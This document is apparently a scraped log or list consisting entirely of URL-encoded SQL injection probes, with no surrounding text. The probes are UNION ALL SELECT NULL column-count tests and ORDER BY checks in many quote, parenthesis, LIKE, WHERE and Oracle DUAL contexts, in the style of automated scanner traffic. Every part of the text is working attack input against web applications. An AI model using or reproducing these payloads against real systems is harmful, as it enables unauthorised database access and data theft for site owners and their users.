1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27jgtp%27%20LIKE%20%27jgtp 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27ZiyM%27%20LIKE%20%27ZiyM 1%27%29%29%29%20ORDER%20BY%201--%20%20AND%20%28%28%28%27EPAh%27%20LIKE%20%27EPAh 1%27%29%29%29%20ORDER%20BY%209287--%20%20AND%20%28%28%28%27FraN%27%20LIKE%20%27FraN 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL--%20%20AND%20%28%28%28%27xHIh%27%20LIKE%20%27xHIh 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27xswW%27%20LIKE%20%27xswW 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27RpOD%27%20LIKE%20%27RpOD 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27lZqk%27%20LIKE%20%27lZqk 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27xrlV%27%20LIKE%20%27xrlV 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27bMwi%27%20LIKE%20%27bMwi 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27bLcg%27%20LIKE%20%27bLcg 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27TBVW%27%20LIKE%20%27TBVW 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27xLcw%27%20LIKE%20%27xLcw 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27svIg%27%20LIKE%20%27svIg 1%27%20ORDER%20BY%201--%20%20AND%20%27ZAXj%27%20LIKE%20%27ZAXj 1%27%20ORDER%20BY%207264--%20%20AND%20%27RYhv%27%20LIKE%20%27RYhv 1%27%20UNION%20ALL%20SELECT%20NULL--%20%20AND%20%27gQdt%27%20LIKE%20%27gQdt 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20AND%20%27HSXb%27%20LIKE%20%27HSXb 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27Sbov%27%20LIKE%20%27Sbov 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27FxyT%27%20LIKE%20%27FxyT 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27VpFs%27%20LIKE%20%27VpFs 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27HMDJ%27%20LIKE%20%27HMDJ 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27mNPT%27%20LIKE%20%27mNPT 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27bOLA%27%20LIKE%20%27bOLA 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27KSQV%27%20LIKE%20%27KSQV 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27ASsL%27%20LIKE%20%27ASsL 1%22%29%20ORDER%20BY%201--%20%20AND%20%28%22IZzw%22%3D%22IZzw 1%22%29%20ORDER%20BY%202154--%20%20AND%20%28%22pMls%22%3D%22pMls 1%22%29%20UNION%20ALL%20SELECT%20NULL--%20%20AND%20%28%22jnsk%22%3D%22jnsk 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20AND%20%28%22aIQa%22%3D%22aIQa 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22ysHH%22%3D%22ysHH 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22ruUd%22%3D%22ruUd 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22UglL%22%3D%22UglL 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22mURD%22%3D%22mURD 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22WziZ%22%3D%22WziZ 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22JuVQ%22%3D%22JuVQ 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22ccMK%22%3D%22ccMK 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22aBxO%22%3D%22aBxO 1%22%29%29%20ORDER%20BY%201--%20%20AND%20%28%28%22dyIP%22%3D%22dyIP 1%22%29%29%20ORDER%20BY%201499--%20%20AND%20%28%28%22CvSj%22%3D%22CvSj 1%22%29%29%20UNION%20ALL%20SELECT%20NULL--%20%20AND%20%28%28%22frqB%22%3D%22frqB 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20AND%20%28%28%22wUgc%22%3D%22wUgc 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22Hdmm%22%3D%22Hdmm 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22Yzyf%22%3D%22Yzyf 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22SRMH%22%3D%22SRMH 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22PFYK%22%3D%22PFYK 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22WaLk%22%3D%22WaLk 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22FLao%22%3D%22FLao 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22PvXF%22%3D%22PvXF 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22VOGR%22%3D%22VOGR 1%22%29%29%29%20ORDER%20BY%201--%20%20AND%20%28%28%28%22aMbz%22%3D%22aMbz 1%22%29%29%29%20ORDER%20BY%209264--%20%20AND%20%28%28%28%22iqcW%22%3D%22iqcW 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL--%20%20AND%20%28%28%28%22wzRR%22%3D%22wzRR 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22JMqj%22%3D%22JMqj 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22ZgGb%22%3D%22ZgGb 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22ZoqB%22%3D%22ZoqB 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22mtKU%22%3D%22mtKU 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22aCqP%22%3D%22aCqP 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22oNUv%22%3D%22oNUv 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22ELBd%22%3D%22ELBd 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22RbNN%22%3D%22RbNN 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22TuHg%22%3D%22TuHg 1%22%20ORDER%20BY%201--%20%20AND%20%22bGqr%22%3D%22bGqr 1%22%20ORDER%20BY%205633--%20%20AND%20%22glEv%22%3D%22glEv 1%22%20UNION%20ALL%20SELECT%20NULL--%20%20AND%20%22VbAY%22%3D%22VbAY 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20AND%20%22XQKw%22%3D%22XQKw 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22GcVB%22%3D%22GcVB 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22nKbD%22%3D%22nKbD 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22ykCX%22%3D%22ykCX 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22ZZTi%22%3D%22ZZTi 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22Lshi%22%3D%22Lshi 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22vsny%22%3D%22vsny 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22mhsM%22%3D%22mhsM 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22WClX%22%3D%22WClX 1%22%29%20ORDER%20BY%201--%20%20AND%20%28%22CFgn%22%20LIKE%20%22CFgn 1%22%29%20ORDER%20BY%207988--%20%20AND%20%28%22rhYH%22%20LIKE%20%22rhYH 1%22%29%20UNION%20ALL%20SELECT%20NULL--%20%20AND%20%28%22CvgT%22%20LIKE%20%22CvgT 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20AND%20%28%22mfix%22%20LIKE%20%22mfix 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22Khzw%22%20LIKE%20%22Khzw 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22OSAh%22%20LIKE%20%22OSAh 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22yDdI%22%20LIKE%20%22yDdI 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22nfYt%22%20LIKE%20%22nfYt 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22obTA%22%20LIKE%20%22obTA 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22SlLB%22%20LIKE%20%22SlLB 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22Kdgl%22%20LIKE%20%22Kdgl 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22IhgY%22%20LIKE%20%22IhgY 1%22%29%29%20ORDER%20BY%201--%20%20AND%20%28%28%22ZJNd%22%20LIKE%20%22ZJNd 1%22%29%29%20ORDER%20BY%205801--%20%20AND%20%28%28%22pNMI%22%20LIKE%20%22pNMI 1%22%29%29%20UNION%20ALL%20SELECT%20NULL--%20%20AND%20%28%28%22fYiC%22%20LIKE%20%22fYiC 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20AND%20%28%28%22Ygqh%22%20LIKE%20%22Ygqh 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22dYlY%22%20LIKE%20%22dYlY 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22ttNl%22%20LIKE%20%22ttNl 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22uctC%22%20LIKE%20%22uctC 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22MYsH%22%20LIKE%20%22MYsH 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22JrzX%22%20LIKE%20%22JrzX 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22gikh%22%20LIKE%20%22gikh 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22qZDz%22%20LIKE%20%22qZDz 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22ocnU%22%20LIKE%20%22ocnU 1%22%29%29%29%20ORDER%20BY%201--%20%20AND%20%28%28%28%22qUFT%22%20LIKE%20%22qUFT 1%22%29%29%29%20ORDER%20BY%204849--%20%20AND%20%28%28%28%22okKi%22%20LIKE%20%22okKi 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL--%20%20AND%20%28%28%28%22qdTx%22%20LIKE%20%22qdTx 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22AmBr%22%20LIKE%20%22AmBr 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22GScA%22%20LIKE%20%22GScA 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22TjqF%22%20LIKE%20%22TjqF 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22uopi%22%20LIKE%20%22uopi 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22Suyq%22%20LIKE%20%22Suyq 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22JRQD%22%20LIKE%20%22JRQD 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22OKvG%22%20LIKE%20%22OKvG 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22LJWl%22%20LIKE%20%22LJWl 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22HVEZ%22%20LIKE%20%22HVEZ 1%22%20ORDER%20BY%201--%20%20AND%20%22cyas%22%20LIKE%20%22cyas 1%22%20ORDER%20BY%204264--%20%20AND%20%22GHmU%22%20LIKE%20%22GHmU 1%22%20UNION%20ALL%20SELECT%20NULL--%20%20AND%20%22Aphh%22%20LIKE%20%22Aphh 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20AND%20%22GEBP%22%20LIKE%20%22GEBP 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22iQbd%22%20LIKE%20%22iQbd 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22KpZV%22%20LIKE%20%22KpZV 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22ehoC%22%20LIKE%20%22ehoC 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22buqt%22%20LIKE%20%22buqt 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22ByIs%22%20LIKE%20%22ByIs 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22HXbB%22%20LIKE%20%22HXbB 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22NFrP%22%20LIKE%20%22NFrP 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22nclL%22%20LIKE%20%22nclL 1%29%20WHERE%208629%3D8629%20ORDER%20BY%201--%20 1%29%20WHERE%208068%3D8068%20ORDER%20BY%208461--%20 1%29%20WHERE%203964%3D3964%20UNION%20ALL%20SELECT%20NULL--%20 1%29%20WHERE%209053%3D9053%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20 1%29%20WHERE%208505%3D8505%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%209151%3D9151%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%204350%3D4350%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%205992%3D5992%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%208722%3D8722%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%205271%3D5271%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%208909%3D8909%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%204653%3D4653%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%201417%3D1417%20ORDER%20BY%201--%20 1%27%29%20WHERE%204185%3D4185%20ORDER%20BY%205826--%20 1%27%29%20WHERE%208191%3D8191%20UNION%20ALL%20SELECT%20NULL--%20 1%27%29%20WHERE%202975%3D2975%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20 1%27%29%20WHERE%207931%3D7931%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%205174%3D5174%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%209550%3D9550%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%202022%3D2022%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%209811%3D9811%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%205401%3D5401%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%203137%3D3137%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%202370%3D2370%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%208573%3D8573%20ORDER%20BY%201--%20 1%27%20WHERE%205247%3D5247%20ORDER%20BY%202815--%20 1%27%20WHERE%209972%3D9972%20UNION%20ALL%20SELECT%20NULL--%20 1%27%20WHERE%207257%3D7257%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20 1%27%20WHERE%202127%3D2127%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%201512%3D1512%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%207742%3D7742%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%201874%3D1874%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%205605%3D5605%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%203772%3D3772%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%207530%3D7530%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%201523%3D1523%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%201440%3D1440%20ORDER%20BY%201--%20 1%22%20WHERE%204007%3D4007%20ORDER%20BY%204627--%20 1%22%20WHERE%203060%3D3060%20UNION%20ALL%20SELECT%20NULL--%20 1%22%20WHERE%205312%3D5312%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20 1%22%20WHERE%206711%3D6711%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%205057%3D5057%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%201299%3D1299%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%205703%3D5703%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%208851%3D8851%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%208258%3D8258%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%207878%3D7878%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%202430%3D2430%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20%7C%7C%20%28SELECT%206811%20FROM%20DUAL%20WHERE%205915%3D5915%20ORDER%20BY%201--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206415%20FROM%20DUAL%20WHERE%203086%3D3086%20ORDER%20BY%206292--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206316%20FROM%20DUAL%20WHERE%209133%3D9133%20UNION%20ALL%20SELECT%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209878%20FROM%20DUAL%20WHERE%207691%3D7691%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203362%20FROM%20DUAL%20WHERE%206726%3D6726%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208597%20FROM%20DUAL%20WHERE%201212%3D1212%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206262%20FROM%20DUAL%20WHERE%209446%3D9446%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 